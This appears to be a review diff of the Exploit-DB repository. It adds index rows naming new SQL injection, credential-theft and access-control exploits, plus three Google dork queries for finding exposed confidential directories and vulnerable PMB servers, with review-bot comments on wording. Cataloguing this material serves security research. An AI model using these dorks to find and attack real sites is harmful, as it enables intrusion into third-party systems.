 201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21,2000-11-20,2016-12-04,1,OSVDB-11805;CVE-2000-0573,,,,http://www.exploit-db.comwu-ftpd-2.6.0-2.src.rpm,
+51814,exploits/multiple/remote/51814.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration",2024-02-26,hyp3rlinx,remote,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25734,,,,,
+51816,exploits/multiple/remote/51816.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'",2024-02-26,hyp3rlinx,remote,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25735,,,,,
 9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,,2009-07-09,2017-04-01,1,CVE-2009-0695;OSVDB-55839,"Metasploit Framework (MSF)",,,,
 1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21,2005-11-03,2018-01-18,1,OSVDB-19682;CVE-2005-3081,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwzdftpd-0.5.4.exe,
 51111,exploits/multiple/remote/51111.txt,"X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)",2023-03-28,"Hosein Vita",remote,multiple,,2023-03-28,2023-03-28,0,CVE-2022-38580,,,,,
@@ -12934,6 +12937,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb
 51749,exploits/php/remote/51749.TXT,"Equipment Rental Script-1.0 - SQLi",2024-01-29,nu11secur1ty,remote,php,,2024-01-29,2024-01-29,0,,,,,,
 24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,remote,php,,2013-01-10,2013-01-10,1,OSVDB-88751,"Metasploit Framework (MSF)",,,,
+51813,exploits/php/remote/51813.txt,"FAQ Management System v1.0 - 'faq' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
+51812,exploits/php/remote/51812.txt,"Flashcard Quiz App v1.0 - 'card' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
 40434,exploits/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,remote,php,,2016-09-27,2016-09-27,0,,"Metasploit Framework (MSF)",,,,
 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,,2019-05-20,2019-05-20,1,CVE-2019-11231,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
 44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,,2018-07-09,2018-07-09,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comgitlist-0.6.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/545e91af0077d1039b0f861346aada45fdfdf10e/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -13069,6 +13074,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21138,exploits/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,remote,php,,2012-09-08,2012-09-08,1,OSVDB-83767,"Metasploit Framework (MSF)",,,,
 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,,2019-05-23,2019-05-23,1,CVE-2017-18357,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
 31264,exploits/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,remote,php,80,2014-01-29,2014-01-29,1,OSVDB-102635,"Metasploit Framework (MSF)",,,,
+51808,exploits/php/remote/51808.txt,"Simple Inventory Management System v1.0 - 'email' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
 27941,exploits/php/remote/27941.rb,"SPIP - 'connect' PHP Injection (Metasploit)",2013-08-29,Metasploit,remote,php,,2013-08-29,2013-08-29,1,OSVDB-83543,"Metasploit Framework (MSF)",,,,
 24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,"Metasploit Framework (MSF)",,,,
 24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,Malware,,,,
@@ -16112,6 +16118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37436,exploits/php/webapps/37436.txt,"Commentics - 'index.php' Cross-Site Scripting",2012-06-20,"Jean Pascal Pereira",webapps,php,,2012-06-20,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54111/info
 19325,exploits/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",webapps,php,,2012-06-21,2012-06-21,0,OSVDB-83148;OSVDB-83147;OSVDB-83146,,,,http://www.exploit-db.comcommentics.zip,
 2648,exploits/php/webapps/2648.txt,"CommentIT - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",webapps,php,,2006-10-24,,1,,,,,,
+51809,exploits/php/webapps/51809.py,"comments-like-dislike < 1.2.0 - Authenticated (Subscriber+) Plugin Setting Reset",2024-02-26,"Diaa Hanna",webapps,php,,2024-02-26,2024-02-26,0,,,,,,
 26570,exploits/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL Injection",2005-11-23,r0t3d3Vil,webapps,php,,2005-11-23,2013-07-03,1,,,,,,https://www.securityfocus.com/bid/15552/info
 33634,exploits/php/webapps/33634.txt,"CommodityRentals CD Rental Software - 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-11,2014-06-04,1,,,,,,https://www.securityfocus.com/bid/38184/info
 36079,exploits/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' HTML Injection",2011-08-24,"Eyup CELIK",webapps,php,,2011-08-24,2015-02-15,1,,,,,,https://www.securityfocus.com/bid/49296/info
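Review bot: The new 51809 row leaves the codes column empty although the advisory header in 51809.py cites `CVE-2023-3244`, and its description says `comments-like-dislike < 1.2.0` while the advisory states `Version: <= 1.2.0` and "up to and including 1.2.0". Other rows added in this same commit (51815, 51814, 51816) do carry their CVE in the codes column, so `CVE-2023-3244` belongs here too and the range should read `<= 1.2.0` so that searches by CVE and by affected version both find the entry.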
@@ -24905,6 +24912,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48647,exploits/php/webapps/48647.txt,"Online Shopping Portal 3.1 - 'email' SQL Injection",2020-07-07,gh1mau,webapps,php,,2020-07-07,2020-07-07,0,,,,,,
 48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,,
 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,,
+51811,exploits/php/webapps/51811.txt,"Online Shopping System Advanced - Sql Injection",2024-02-26,"Furkan Gedik",webapps,php,,2024-02-26,2024-02-26,0,,,,,,
 48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,,
 51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-05-31,1,,,,,,
 35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info
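Review bot: The added row 51811 writes `Sql Injection` where every neighbouring row in this hunk uses `SQL Injection`, and its description carries no version although both existing "Online shopping system advanced 1.0" rows do; suggest `"Online Shopping System Advanced - SQL Injection"` with the version the advisory states, if any. The same description hygiene applies to the added rows in the next two hunks: 51810 uses lowercase `taskhub` while its neighbours write `Taskhub`, and the 51817 title contains `1.1.4_ v1.1.4.3`, where the underscore reads like a typo for a range separator. These are index-text nits only; the file paths and dates in the new rows look consistent with the surrounding entries.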
@@ -30546,6 +30554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35337,exploits/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70878,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
 35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70932,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
 16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990
+51810,exploits/php/webapps/51810.txt,"taskhub 2.8.7 - SQL Injection",2024-02-26,CraCkEr,webapps,php,,2024-02-26,2024-02-26,0,,,,,,
 51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 51782,exploits/php/webapps/51782.txt,"TASKHUB-2.8.8 - XSS-Reflected",2024-02-05,nu11secur1ty,webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
@@ -46237,6 +46246,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,,2019-01-28,2019-01-29,0,CVE-2018-6892,"Buffer Overflow",,,http://www.exploit-db.comCloudMe_1112.exe,
 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,,2018-05-28,2018-05-28,0,,,,,,
 44275,exploits/windows_x86-64/remote/44275.txt,"DEWESoft X3 SP1 (x64) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows_x86-64,,2018-03-12,2018-03-12,0,CVE-2018-7756,,,,,
+51817,exploits/windows_x86-64/remote/51817.txt,"IBM i Access Client Solutions v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4 - Remote Credential Theft",2024-02-26,hyp3rlinx,remote,windows_x86-64,,2024-02-26,2024-02-26,0,CVE-2024-22318,,,,,
 42354,exploits/windows_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,remote,windows_x86-64,,2017-07-24,2017-07-26,0,CVE-2017-0059;CVE-2017-0037,,,,,https://redr2e.com/cve-to-exploit-cve-2017-0037-and-0059/
 42030,exploits/windows_x86-64/remote/42030.py,"Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445,2017-05-19,2019-03-28,1,CVE-2017-0144,,EternalBlue,http://www.exploit-db.com/screenshots/idlt42500/screen-shot-2018-09-30-at-103641.png,,https://github.com/worawit/MS17-010/blob/873c5453680a0785415990379a4b36ba61f82a4d/eternalblue_exploit8.py
 41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64,,2017-05-10,2018-10-17,0,CVE-2017-0148;CVE-2017-0147;CVE-2017-0146;CVE-2017-0145;CVE-2017-0144;CVE-2017-0143,,,,,
diff --git a/ghdb.xml b/ghdb.xml
index 9c214f1cfd..0f74431271 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -41760,6 +41760,21 @@ Sagar Banwa 2023-02-27 Sanu Jose M + + 8420 + https://www.exploit-db.com/ghdb/8420 + Files Containing Juicy Info + intitle:"Index of /confidential" + Description-* intitle:"Index of /confidential"* +This google dork searches in the title of websites for the ""Index of +/confidential" + + intitle:"Index of /confidential" + https://www.google.com/search?q=intitle:"Index of /confidential" + + 2024-02-26 + Gautam Rawat + 8039 https://www.exploit-db.com/ghdb/8039
@@ -51560,6 +51575,27 @@ Dxtroyer 2023-11-20 Sathish Kishore + + 8418 + https://www.exploit-db.com/ghdb/8418 + Files Containing Juicy Info + inurl:"/wp-json/oembed/1.0/embed?url=" + Google Dork: +inurl:"/wp-json/oembed/1.0/embed?url=" + +Description: +Using this Google dork can help identify WordPress sites that have their +oEmbed API publicly accessible, which could potentially be useful for +various purposes such as content scraping, data analysis, or security +research. However, it's essential to use this information ethically and +responsibly, respecting the privacy and security of the websites you +interact with. + inurl:"/wp-json/oembed/1.0/embed?url=" + https://www.google.com/search?q=inurl:"/wp-json/oembed/1.0/embed?url=" + + 2024-02-26 + Jeel Patel + 4678 https://www.exploit-db.com/ghdb/4678
@@ -116029,6 +116065,23 @@ Ahmad Al-Nounou 2014-05-05 anonymous + + 8419 + https://www.exploit-db.com/ghdb/8419 + Vulnerable Servers + "PMB" AND ("changelog.txt" OR inurl:opac_css) + The Dork Filters for PMB Services, Mostly vulnerable to SQli and handful of +CVEs + +*"PMB" AND ("changelog.txt" OR inurl:opac_css)* + + + "PMB" AND ("changelog.txt" OR inurl:opac_css) + https://www.google.com/search?q="PMB" AND ("changelog.txt" OR inurl:opac_css) + + 2024-02-26 + Wallehazz + 6161 https://www.exploit-db.com/ghdb/6161
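Review bot: The new textual description of entry 8420 contains a doubled quote in `for the ""Index of`, which reads as a typo for `for the "Index of`, and that text will be published verbatim once indexed. The same wording hygiene applies in the third hunk of this file, where entry 8419's description writes `SQli` for `SQLi` and presents an unsourced vulnerability claim about the matched product; a reference to the CVEs it alludes to would make the entry verifiable. These observations come from the collapsed hunk text, in which the XML element tags appear to have been stripped, so please confirm them against the raw file before editing.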